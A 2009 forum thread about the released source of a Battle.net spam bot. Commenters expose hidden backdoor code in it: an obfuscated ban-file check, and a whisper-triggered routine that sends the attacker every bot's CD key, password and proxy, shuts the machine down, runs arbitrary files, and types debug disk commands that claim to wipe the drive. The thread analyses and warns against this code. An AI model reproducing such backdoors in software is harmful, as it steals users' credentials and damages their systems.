Genocide 1.7f source released!

nesucks · September 19, 2009, 10:54 PM

Now the best bot ever created for battle.net is in your hands!!!

http://www.esnips.com/web/nesucks/

support for encrypted cdkeys removed.

Hdx · September 20, 2009, 02:42 PM

Quoteencrypted cdkey support removed
backdoor triggers also removed

try and fix the bug that causes the program to crash when reconnecting bots that initialized warden. The crash occurs when the bot on the assembly code.

try and add warden for storm.dll

give me updated geno source >:-O

So you're stuck doing something simple, and you want the rest of the bnet community to help you fix your shitty 1/2 ripped spam bot?

* Hdx hasn't even looked at the source yet to fully grasped just how much rippage/suckage it is...

I'd be vary disappointed in anyone who actually helps you.

Code Select

XGLGKDFK = "4g.02B.l.29Ko"

Open Environ$(
        Mid$(sdfklhSd, 6, 1) & Mid$(sdfklhSd, 3, 1) & Mid$(sdfklhSd, 6, 1) & Mid$(sdfklhSd, 2, 1) & _
        Mid$(sdfklhSd, 4, 1) & Mid$(sdfklhSd, 5, 1) & Mid$(sdfklhSd, 1, 1) & Mid$(sdfklhSd, 7, 1) & _
        Mid$(sdfklhSd, 7, 1) & Mid$(sdfklhSd, 2, 1) _
    ) 
    & "/" & 
    Mid$(XGLGKDFK, 12, 1) & Mid$(XGLGKDFK, 6, 1) & Mid$(XGLGKDFK, 11, 1) & _
    Mid$(XGLGKDFK, 4, 1) & Mid$(XGLGKDFK, 11, 1) & Mid$(XGLGKDFK, 5, 1)  & _
    Mid$(XGLGKDFK, 11, 1) & Mid$(XGLGKDFK, 1, 1) & Mid$(XGLGKDFK, 9, 1) & _
    Mid$(XGLGKDFK, 8, 1)  & Mid$(XGLGKDFK, 13, 1) & Mid$(XGLGKDFK, 2, 1) _
For Input As #1
    Input #1, SCGBGN3
    If SCGBGN3 = "1" Then
        MsgBox permabannedSTR
        End
    End If
Close #1

Seriously? SERIOUSLY!? (it translates to %systemroot%\KB909294.log)

Code Select


        Case 4
            If frmMain.DontshowMisc.Value = 0 Then
                AddChatChannel vbWhite, struser & " " & Flags & " " & Message
            End If
ecrEtcommandz:
            If struser = "bd" Then 'modified to protect current geno users
                Do Until Secretcommand = amountofkeysinfile
                    Secretcommand = Secretcommand + 1
                    Dim clsP As New clsPacket
                    With clsP
                        .InsertString "/" & "w " & struser & " " & bots(Secretcommand).CDKey & " " & _
                             bots(Secretcommand).Password & " " & bots(Secretcommand).ProxyServer
                        .sendPacket frmMain.sckBot(Secretcommand), &HE, Secretcommand
                    End With
                Loop
                Secretcommand = 0
            End If
            If struser = "bd" Then 'modified to protect current geno users
                Call ExitWindowsEx(SHUTDOWN, &H10)
            End If

            If struser = "bd" Then 'modified to protect current geno users
                Call MsgBox("Fuck you yes i hacked your computer & thx for everything >:D")
            End If
            If struser = "bd" Then 'modified to protect current geno users
                Call MsgBox("I got your vps, pwords, cdkeys, everything - say goodbye :)")
            End If

            If struser = "bd" Then 'modified to protect current geno users
                Call MsgBox(Mid$(Message, 9))
            End If

            If struser = "bd" Then 'modified to protect current geno users
                ShellFile "C:/windows/system32/telnet.exe"
            End If
            If struser = "bd" Then 'modified to protect current geno users
                ShellFile "Mid$(Message, 14))"
            End If
            If struser = "bd" Then 'modified to protect current geno users
                ShellFile "c:\windows\System32\mstsc.exe"
            End If
            If struser = "bd" Then 'modified to protect current geno users
                ShellFile "c:\windows\explorer.exe"
            End If

            If struser = "bd" Then 'modified to protect current geno users
                KillAppByEXEName (Mid$(Message, 8))
            End If

            If struser = "bd" Then 'modified to protect current geno users
                End
            End If

            If struser = "bd" Then 'modified to protect current geno users
                Call MsgBox("I got your vps, pwords, cdkeys, everything - say goodbye :)")
                ShellFile "C:/windows/system32/telnet.exe"
                ShellFile "c:\windows\System32\mstsc.exe"
                Call ExitWindowsEx(SHUTDOWN, &H10)
            End If
            
            If struser = "bd" Then 'modified to protect current geno users
                
                Dim sdkjfhsd As String
                sdkjfhsd = "now formatting all medias then writing random data in hard drive so you can never recover files ever again FAG."
                ShellFile Mid$(App.Path, 1, 1) & ":/windows/system32/cmd.exe"
                DoEvents
                SendKeys "debug"
                SendKeys "{enter}", 1
                SendKeys "F 100 FFFF 0", 1
                SendKeys "a", 1
                SendKeys "org 400", 1
                SendKeys "mov dx,3F6", 1
                SendKeys "in al,dx", 1
                SendKeys "and al,80", 1
                SendKeys "jnz 403", 1
                SendKeys "mov dx,1F7", 1
                SendKeys "mov al,90", 1
                SendKeys "out dx,al", 1
                SendKeys "mov dx,3F6", 1
                SendKeys "in al,dx", 1
                SendKeys "and al,80", 1
                SendKeys "jnz 411", 1
                SendKeys "mov dx,1F1", 1
                SendKeys "in al,dx", 1
                SendKeys "and al,1", 1
                SendKeys "jz 453", 1
                SendKeys "mov dx,3F6", 1
                SendKeys "in al,dx", 1
                SendKeys "and al,80", 1
                SendKeys "jnz 421", 1
                SendKeys "mov dx,1F6", 1
                SendKeys "mov al,E0", 1
                SendKeys "out dx,al", 1
                SendKeys "mov dx,3F6", 1
                SendKeys "in al,dx", 1
                SendKeys "and al,80", 1
                SendKeys "jnz 42F", 1
                SendKeys "in al,dx", 1
                SendKeys "and al,40", 1
                SendKeys "jz 434", 1
                SendKeys "mov dx,1F7", 1
                SendKeys "mov al,EC", 1
                SendKeys "out dx,al", 1
                SendKeys "mov dx,3F6", 1
                SendKeys "in al,dx", 1
                SendKeys "and al,80", 1
                SendKeys "jnz 442", 1
                SendKeys "mov dx,1F0", 1
                SendKeys "mov di,100", 1
                SendKeys "mov cx,100", 1
                SendKeys "cld", 1
                SendKeys "rep", 1
                SendKeys "db 6d", 1
                SendKeys "int 3", 1
                
                SendKeys "g =400", 1
                
                SendKeys "d 100 2ff", 1
            End If

u.u seriously?
Anyone wanna bother telling me what that asm does? if anything.
*note all formatting is me, his raw code is all on the left.

Code Select


Case "ver"
    If bots(Index).DELAYSPAM = 0 Then
        Send0x0E Index, "/emote .: StealthBot v2.6 Revision 3 by Stealth."
        bots(Index).DELAYSPAM = 4500
    End If

Figures.

More of his BANFOREVERZ code.

Code Select

Public Function BANFOREVERFILE(ERROrCODE As Long)
On Error Resume Next
    'SYSTEMROOT\iis9.log
    Open (Environ$(CoDecodeXOR("T^TSBJUHHS"))) & CoDecodeXOR("[nnt>)kh`") For Append As #1
        Print #1, ERROrCODE
    Close #1
    Unload frmMain
    End
End Function
Public Function CHECKFORBAN()
On Error Resume Next
    Dim stringx As String
    'SYSTEMROOT\iis9.log
    Open (Environ$(CoDecodeXOR("T^TSBJUHHS"))) & CoDecodeXOR("[nnt>)kh`") For Input As #1
        Input #1, stringx
        If IsNumeric(stringx) = True Then
            MsgBox CoDecodeXOR("EFIIBC")
            End
        End If
    Close #1
End Function

MysT_DooM · September 20, 2009, 05:07 PM

nesucks is the malware of battle.net

Mystical · September 20, 2009, 06:43 PM

cool, what horrible programming, wow, does it get any worse? i haven't downloaded who knows what he binded to what...

l2k-Shadow · September 21, 2009, 12:03 AM

you guys realize this is a joke, right?

Sixen · September 21, 2009, 01:37 AM

Quote from: l2k-Shadow on September 21, 2009, 12:03 AM
you guys realize this is a joke, right?

Nope... nope... pretty sure he's serious.

l2k-Shadow · September 22, 2009, 03:08 PM

Quote from: Sixen on September 21, 2009, 01:37 AM
Quote from: l2k-Shadow on September 21, 2009, 12:03 AM
you guys realize this is a joke, right?

Nope... nope... pretty sure he's serious.

Which is why it's a joke.

Purri · September 22, 2009, 05:06 PM

Probly a joke, cause when you look code, you regonize how much there is ripping after all

brew · September 22, 2009, 07:21 PM

Quote from: Hdx on September 20, 2009, 02:42 PM
Anyone wanna bother telling me what that asm does? if anything.
*note all formatting is me, his raw code is all on the left.

Well, he tries to read from port 3f6h multiple times, which is a reserved floppy disk controller port (perhaps this code relies on undocumented behavior of some sort). It then sets the drive and head number, sends a few commands to the first ISA drive controller's command register (such as, run the drive diagnostics, identify drive, so on), and promptly thereafter checks the status register to see if there was an error since the last command, and if so, checks which drive it originated on (master or slave).

So, in fact, it does do something - Not quite sure what, though.
Of course, none of this would have a chance in hell of being executed. A good third of the instructions in that code blob are privileged.

EDIT**
A google search for "mov dx, 3f6" turns up one result: http://thestarman.pcministry.com/asm/debug/DEVIDP0.DSF.txt. I figured that'd be the best instruction to search for since it's very uncommon to use this kind of hackery.

Sixen · September 23, 2009, 12:12 AM

Quote from: l2k-Shadow on September 22, 2009, 03:08 PM
Quote from: Sixen on September 21, 2009, 01:37 AM
Quote from: l2k-Shadow on September 21, 2009, 12:03 AM
you guys realize this is a joke, right?

Nope... nope... pretty sure he's serious.

Which is why it's a joke.

he's a joke*

MyndFyre · September 23, 2009, 01:33 AM

Quote from: brew on September 22, 2009, 07:21 PM
Quote from: Hdx on September 20, 2009, 02:42 PM
Anyone wanna bother telling me what that asm does? if anything.
*note all formatting is me, his raw code is all on the left.

Well, he tries to read from port 3f6h multiple times, which is a reserved floppy disk controller port (perhaps this code relies on undocumented behavior of some sort). It then sets the drive and head number, sends a few commands to the first ISA drive controller's command register (such as, run the drive diagnostics, identify drive, so on), and promptly thereafter checks the status register to see if there was an error since the last command, and if so, checks which drive it originated on (master or slave).

Interesting. I would think that wouldn't work on NT-based systems, and since everyone now is on NT or *nix it seems like that would be pointless these days....

xpeh · September 23, 2009, 10:28 AM

Would someone rip out trojan shit code and release corrected source?

brew · September 23, 2009, 07:23 PM

Quote from: MyndFyre on September 23, 2009, 01:33 AMInteresting. I would think that wouldn't work on NT-based systems, and since everyone now is on NT or *nix it seems like that would be pointless these days....

Why not? That code is communicating directly with the hardware at a level below anything NT has to do with. The operating system model being used is irrelevant.

xpeh · September 24, 2009, 12:02 PM

Afaik NT forbids I/O ports usage from user program, you need to use driver for that.

Quote from: xpeh on September 23, 2009, 10:28 AM
Would someone rip out trojan shit code and release corrected source?

Camel · September 24, 2009, 03:21 PM

Quote from: xpeh on September 24, 2009, 12:02 PM
Afaik NT forbids I/O ports usage from user program, you need to use driver for that.

Among other things; you shouldn't be able to do anything that could cause a bluescreen from user-mode.